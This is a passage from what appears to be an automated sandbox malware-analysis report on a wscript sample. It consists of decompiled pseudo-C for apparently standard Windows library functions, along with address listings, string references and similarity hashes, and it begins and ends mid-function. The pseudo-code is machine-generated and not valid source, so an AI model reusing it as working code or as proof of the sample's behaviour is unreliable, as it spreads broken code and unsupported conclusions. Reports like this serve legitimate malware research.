						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E05989860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x059c51be
0x059c51c3
0x059c51c8
0x059c51cd
0x059c51d0
0x059c51d3
0x059c51d8
0x059c51db
0x059c51de
0x059c51e0
0x059c51e3
0x059c51e6
0x059c51e8
0x059c5342
0x059c5351
0x059c5356
0x059c535a
0x059c5360
0x059c5363
0x059c5366
0x059c5369
0x059c5369
0x059c536b
0x059c536b
0x059c5370
0x059c53a3
0x059c53a4
0x059c53a6
0x059c53ab
0x059c53ab
0x059c53ae
0x059c53ae
0x059c53b5
0x059c53bf
0x059c53bf
0x059c5375
0x059c5396
0x059c53a0
0x059c53a0
0x00000000
0x059c5396
0x059c5377
0x059c5379
0x059c537f
0x059c538c
0x059c5390
0x00000000
0x059c5390
0x059c51ee
0x059c51f1
0x059c5301
0x059c5310
0x059c5315
0x059c5318
0x059c531b
0x059c5320
0x059c532e
0x059c5331
0x00000000
0x059c5331
0x059c5328
0x059c5329
0x00000000
0x059c5329
0x059c51fa
0x059c5235
0x059c5236
0x059c5239
0x059c523f
0x059c5240
0x059c5241
0x059c5242
0x059c5246
0x059c5247
0x059c524e
0x059c5251
0x059c5267
0x059c5269
0x059c526e
0x059c527d
0x059c527e
0x059c5281
0x059c5282
0x059c5287
0x059c5288
0x059c528a
0x059c528f
0x059c5294
0x00000000
0x00000000
0x059c529a
0x059c529c
0x059c529e
0x059c529e
0x059c52a4
0x059c52b0
0x00000000
0x00000000
0x059c52ba
0x059c52bc
0x059c52bc
0x059c52d4
0x059c52d9
0x059c52dc
0x059c52e1
0x00000000
0x00000000
0x059c52e7
0x059c52f4
0x00000000
0x059c52f4
0x059c5270
0x00000000
0x059c5270
0x059c51fc
0x059c51fd
0x059c5202
0x059c5203
0x059c5205
0x059c520a
0x059c520f
0x00000000
0x00000000
0x059c521b
0x059c5226
0x059c522b
0x059c521d
0x059c521d
0x059c5222
0x059c5222
0x059c522d
0x00000000

Strings

UEFI, xrefs: 059C521D
Legacy, xrefs: 059C5226

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: dc137a8dc60b3056fd502089335f8b1499064ed52b04c574c8d61064836b2f74
Instruction ID: 55c20c389155f35449ff04b6e7045100e42469d6aa5925413e47e2ed246bd3d7
Opcode Fuzzy Hash: dc137a8dc60b3056fd502089335f8b1499064ed52b04c574c8d61064836b2f74
Instruction Fuzzy Hash: 64519E71A04719DFDB24DFA8D884AADBBF9FF48700F1544ADE50AEB291DB71A900CB11

Uniqueness

Uniqueness Score: -1.00%

Function 0596B944 Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0596B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x5a3d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E05967D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E05A18CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E05989E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0598B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0598CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E05967D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E05A18F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0598AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x5a38628; // 0x0
								_v68 = _t77;
								_t78 =  *0x5a3862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x5a38628; // 0x0
							_t116 =  *0x5a3862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0596b94c
0x0596b956
0x0596b95c
0x0596b95e
0x0596b964
0x0596b969
0x0596b96d
0x0596b96d
0x0596b970
0x0596b974
0x0596b97a
0x0596badf
0x0596badf
0x0596bae2
0x0596bae4
0x0596bae6
0x0596baf0
0x059b2cb8
0x0596baf6
0x0596baf6
0x0596baf6
0x0596bafd
0x0596bb1f
0x0596bb1f
0x0596baff
0x0596bb00
0x0596bb00
0x0596bb03
0x0596bb03
0x0596bacb
0x0596bacf
0x0596bad0
0x0596bad1
0x0596badc
0x0596badc
0x0596b980
0x0596b980
0x0596b988
0x0596b98b
0x0596b98d
0x0596b990
0x0596b993
0x0596b999
0x0596b99b
0x0596b9a1
0x0596b9a5
0x0596b9aa
0x0596b9b0
0x0596b9bb
0x0596b9c0
0x0596b9c3
0x0596b9ca
0x0596b9cc
0x0596b9cf
0x0596b9d3
0x0596b9d7
0x0596ba94
0x0596ba94
0x0596ba98
0x0596baa3
0x059b2ccb
0x0596baa9
0x0596baa9
0x0596baa9
0x0596bab1
0x059b2cd5
0x059b2cdd
0x059b2cdd
0x0596babb
0x0596babc
0x0596bac2
0x0596bac3
0x0596bac3
0x0596bac6
0x00000000
0x0596b9dd
0x0596b9dd
0x0596b9e7
0x0596b9e7
0x0596b9ec
0x0596b9ec
0x0596b9f1
0x0596b9f5
0x0596b9fa
0x0596ba00
0x0596ba0c
0x0596ba10
0x0596ba10
0x0596ba12
0x0596ba18
0x00000000
0x00000000
0x0596bb26
0x0596bb26
0x0596ba1e
0x0596ba1e
0x0596ba23
0x0596ba25
0x0596ba2c
0x0596ba30
0x0596ba35
0x0596ba35
0x0596ba41
0x0596ba46
0x0596ba4c
0x0596ba50
0x0596ba54
0x0596ba6a
0x0596ba6e
0x0596ba70
0x0596ba74
0x0596ba78
0x0596ba7a
0x0596ba7c
0x0596ba8e
0x0596ba90
0x0596ba92
0x0596bb14
0x0596bb14
0x0596bb16
0x0596bb16
0x00000000
0x0596ba7c
0x0596bb0a
0x0596bb0d
0x00000000
0x00000000
0x00000000
0x0596bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0596B9A5

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 39d8b04451b1eeb41435e01507cd5c31379a89535003aa61d43d05adf332fd82
Instruction ID: 39d21868f0e5b6c2bd34127097161c801de41614137a48b0127b858cb51ff6a7
Opcode Fuzzy Hash: 39d8b04451b1eeb41435e01507cd5c31379a89535003aa61d43d05adf332fd82
Instruction Fuzzy Hash: 89515A75618301CFC720DF29C48092BBBEAFB88654F54896EF595C7354E771E848CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0594B171 Relevance: 1.7, APIs: 1, Instructions: 166
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E0594B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x5a1f7a8);
				E0599D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0599D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0598D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0598F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0599DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0598B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0598B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0598E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0598A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x0594b171
0x0594b171
0x0594b171
0x0594b171
0x0594b171
0x0594b176
0x0594b17b
0x0594b180
0x0594b186
0x0594b18f
0x0594b198
0x0594b1a4
0x0594b1aa
0x059a4802
0x059a4802
0x059a4805
0x059a480c
0x059a480e
0x0594b1d1
0x0594b1d3
0x0594b1de
0x0594b1de
0x059a4817
0x059a481e
0x059a4820
0x059a4822
0x059a4822
0x059a4824
0x059a4824
0x059a482a
0x00000000
0x00000000
0x059a4835
0x059a483a
0x059a483d
0x059a483f
0x059a4842
0x059a4842
0x059a4842
0x059a4846
0x059a484c
0x059a484e
0x059a4851
0x059a4851
0x059a4853
0x059a4854
0x059a4854
0x059a4858
0x059a485a
0x059a485a
0x059a485d
0x059a485f
0x059a4861
0x059a4861
0x059a4866
0x059a486b
0x059a486e
0x059a4871
0x059a4876
0x059a4876
0x059a4878
0x059a487b
0x059a4884
0x059a4884
0x00000000
0x059a487d
0x059a487d
0x059a4882
0x059a4889
0x059a4889
0x059a488f
0x059a4891
0x059a48e0
0x059a48e2
0x059a48e4
0x059a48e4
0x059a48e7
0x059a48e7
0x059a48ed
0x059a48f4
0x059a48f6
0x059a4951
0x059a4951
0x059a4953
0x059a4953
0x059a4956
0x059a4956
0x059a4958
0x059a4959
0x059a4959
0x059a495d
0x059a495d
0x059a495f
0x059a495f
0x059a4965
0x059a4969
0x059a49ba
0x059a49ba
0x059a49c1
0x059a49c5
0x059a49cc
0x059a49d4
0x059a49d7
0x059a49da
0x059a49e4
0x059a49e5
0x059a49f3
0x059a4a02
0x00000000
0x059a4a02
0x059a4972
0x059a4974
0x00000000
0x00000000
0x059a4976
0x059a4979
0x059a4982
0x059a4983
0x059a4984
0x059a498b
0x059a498d
0x059a4991
0x059a4993
0x059a4999
0x059a499d
0x059a49a2
0x059a49a2
0x059a49a2
0x059a4999
0x059a49ac
0x00000000
0x059a49b3
0x059a48f8
0x059a48fe
0x00000000
0x00000000
0x00000000
0x059a48fe
0x059a4895
0x059a489c
0x059a48ad
0x059a48b2
0x059a48b5
0x059a48b7
0x059a48ba
0x059a48bc
0x059a48c6
0x059a48c6
0x059a48cb
0x059a48d1
0x059a48d4
0x059a48d8
0x059a48d8
0x00000000
0x059a48d8
0x059a48be
0x059a48c0
0x00000000
0x00000000
0x059a48c2
0x00000000
0x00000000
0x00000000
0x059a48c4
0x00000000
0x059a4882
0x059a487b
0x059a4904
0x059a4906
0x00000000
0x00000000
0x059a4908
0x059a490e
0x00000000
0x00000000
0x059a4910
0x059a4917
0x059a4917
0x00000000
0x059a4917
0x0594b1ba
0x059a47f9
0x059a47fc
0x00000000
0x00000000
0x00000000
0x059a47fc
0x0594b1c0
0x0594b1c0
0x0594b1c3
0x0594b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 059A48AD

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 6f8798899d82d07e838ddad196636246ae4c6cfcaff06b66ba7b2cbf429db412
Instruction ID: 61243f92e3634201c9afa4510c55983d29ae53f013b61ab675aed2b2fc27c452
Opcode Fuzzy Hash: 6f8798899d82d07e838ddad196636246ae4c6cfcaff06b66ba7b2cbf429db412
Instruction Fuzzy Hash: BB510072E002598EDF31CF68C844BBEBBB6BF44710F2041A9D85DAB281C3B499458BE1

Uniqueness

Uniqueness Score: -1.00%

Function 05972581 Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E05972581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t234;
				signed int _t238;
				signed int _t253;
				signed int _t255;
				intOrPtr _t257;
				signed int _t260;
				signed int _t267;
				signed int _t270;
				signed int _t278;
				signed int _t284;
				signed int _t286;
				signed int _t288;
				unsigned int _t291;
				signed int _t295;
				signed int _t297;
				signed int _t301;
				intOrPtr _t313;
				signed int _t322;
				signed int _t324;
				void* _t326;
				signed int _t327;
				signed int _t331;
				signed int _t332;
				void* _t334;
				signed int _t335;
				signed int _t337;
				signed int _t339;
				void* _t340;
				void* _t342;

				_t337 = _t339;
				_t340 = _t339 - 0x4c;
				_v8 =  *0x5a3d360 ^ _t337;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t331 = 0x5a3b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t291 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t284 = 0x48;
				_t311 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t322 = 0;
				_v37 = _t311;
				if(_v48 <= 0) {
					L16:
					_t45 = _t284 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t332 = 0xc0000106;
						goto L32;
					} else {
						_t331 = L05964620(_t291,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t284);
						_v52 = _t331;
						__eflags = _t331;
						if(_t331 == 0) {
							_t332 = 0xc0000017;
							goto L32;
						} else {
							 *(_t331 + 0x44) =  *(_t331 + 0x44) & 0x00000000;
							_t50 = _t331 + 0x48; // 0x48
							_t324 = _t50;
							_t311 = _v32;
							 *(_t331 + 0x3c) = _t284;
							_t286 = 0;
							 *((short*)(_t331 + 0x30)) = _v48;
							__eflags = _t311;
							if(_t311 != 0) {
								 *(_t331 + 0x18) = _t324;
								__eflags = _t311 - 0x5a38478;
								 *_t331 = ((0 | _t311 == 0x05a38478) - 0x00000001 & 0xfffffffb) + 7;
								E0598F3E0(_t324,  *((intOrPtr*)(_t311 + 4)),  *_t311 & 0x0000ffff);
								_t311 = _v32;
								_t340 = _t340 + 0xc;
								_t286 = 1;
								__eflags = _a8;
								_t324 = _t324 + (( *_t311 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t278 = E059D39F2(_t324);
									_t311 = _v32;
									_t324 = _t278;
								}
							}
							_t295 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t332 = _v68;
								__eflags = 0;
								 *((short*)(_t324 - 2)) = 0;
								goto L32;
							} else {
								_t284 = _t331 + _t286 * 4;
								_v56 = _t284;
								do {
									__eflags = _t311;
									if(_t311 != 0) {
										_t234 =  *(_v60 + _t295 * 4);
										__eflags = _t234;
										if(_t234 == 0) {
											goto L30;
										} else {
											__eflags = _t234 == 5;
											if(_t234 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t284 =  *(_v60 + _t295 * 4);
										 *(_t284 + 0x18) = _t324;
										_t238 =  *(_v60 + _t295 * 4);
										__eflags = _t238 - 8;
										if(_t238 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t238 * 4 +  &M05972959))) {
												case 0:
													__ax =  *0x5a38488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0598F3E0(__edi,  *0x5a3848c, __ax & 0x0000ffff);
														__eax =  *0x5a38488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0598F3E0(_t324, _v80, _v64);
													_t273 = _v64;
													goto L26;
												case 2:
													 *0x5a38480 & 0x0000ffff = E0598F3E0(__edi,  *0x5a38484,  *0x5a38480 & 0x0000ffff);
													__eax =  *0x5a38480 & 0x0000ffff;
													__eax = ( *0x5a38480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0598F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0598F3E0(_t324, _v76, _v36);
														_t273 = _v36;
													}
													L26:
													_t340 = _t340 + 0xc;
													_t324 = _t324 + (_t273 >> 1) * 2 + 2;
													__eflags = _t324;
													L27:
													_push(0x3b);
													_pop(_t275);
													 *((short*)(_t324 - 2)) = _t275;
													goto L28;
												case 6:
													__ebx =  *0x5a3575c;
													__eflags = __ebx - 0x5a3575c;
													if(__ebx != 0x5a3575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0598F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x5a3575c;
														} while (__ebx != 0x5a3575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x5a38478 & 0x0000ffff = E0598F3E0(__edi,  *0x5a3847c,  *0x5a38478 & 0x0000ffff);
													__eax =  *0x5a38478 & 0x0000ffff;
													__eax = ( *0x5a38478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E059D39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x5a36e58 & 0x0000ffff = E0598F3E0(__edi,  *0x5a36e5c,  *0x5a36e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x5a36e58 & 0x0000ffff;
													__eax = ( *0x5a36e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t295 = _v16;
													_t311 = _v32;
													L29:
													_t284 = _t284 + 4;
													__eflags = _t284;
													_v56 = _t284;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t295 = _t295 + 1;
									_v16 = _t295;
									__eflags = _t295 - _v48;
								} while (_t295 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t238 =  *(_v60 + _t322 * 4);
						if(_t238 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t238 * 4 +  &M05972935))) {
							case 0:
								__ax =  *0x5a38488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
